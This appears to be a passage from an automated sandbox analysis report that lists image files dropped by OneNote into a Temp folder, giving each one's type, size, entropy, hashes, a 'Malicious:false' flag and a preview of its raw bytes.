                                                                                                                                            MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                            SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                            SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                            SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{17989EDE-927A-4D77-A6BA-81547A8025B8}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14553
                                                                                                                                            Entropy (8bit):7.951135681293377
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                            MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                            SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                            SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                            SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{17D2427D-72D6-46FB-912F-43025BDF8F27}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2270
                                                                                                                                            Entropy (8bit):7.845368393313232
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                            MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                            SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                            SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                            SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{17DB1490-9F98-44D2-8A1E-BAAAAAC57B64}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4081
                                                                                                                                            Entropy (8bit):7.943373267196131
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                            MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                            SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                            SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                            SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1918CBAE-015E-497E-9669-4A3C802211C0}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{19225264-DF55-4546-BA97-633A078585B3}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14458
                                                                                                                                            Entropy (8bit):7.944094738048628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                            MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                            SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                            SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                            SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{19815232-4866-426E-A87D-A0B5C5EDD387}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{19F81CF2-F275-4913-9EED-619E2DB2B3C3}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3879
                                                                                                                                            Entropy (8bit):7.9281351307465044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                            MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                            SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                            SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                            SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1A528117-52D6-434A-B169-B4EC3608D380}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):7.837610270261933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                            MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                            SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                            SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                            SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1A848B30-42B3-44AD-867C-51E67AC38F62}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5465
                                                                                                                                            Entropy (8bit):7.79401348966645
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
                                                                                                                                            MD5:8470F9A96B6C6CAD9EE60961E96D19B2
                                                                                                                                            SHA1:AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
                                                                                                                                            SHA-256:2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
                                                                                                                                            SHA-512:CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w|.H..*.K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.|f/..+\ID.r/.o........0i..*.G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?*...I....M.0<.u....!..C..U.T.....s.Q......_..7K..*.....?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1A9B1162-A9E6-4573-B9C2-1EA1EF257DFF}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2210
                                                                                                                                            Entropy (8bit):7.86853667196985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                            MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                            SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                            SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                            SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1AFA6D60-4AAE-41F6-9B4A-2A37295A8C6B}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15740
                                                                                                                                            Entropy (8bit):6.0674556182683945
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                            MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                            SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                            SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                            SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1C0FD4A4-AC4D-4EFD-B19F-A8BC0D7E95C7}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 60 x 336, 4-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):347
                                                                                                                                            Entropy (8bit):6.85024426015615
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
                                                                                                                                            MD5:78762C169F8B104CB57DFF5A1669D2DF
                                                                                                                                            SHA1:9638B71B584CD636834016A635ABF8D9C0887711
                                                                                                                                            SHA-256:E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
                                                                                                                                            SHA-512:5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1EFC1EF2-6CBC-4A49-A528-7FF5FD4E5CD7}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.950380155401321
                                                                                                                                            Encrypted:false
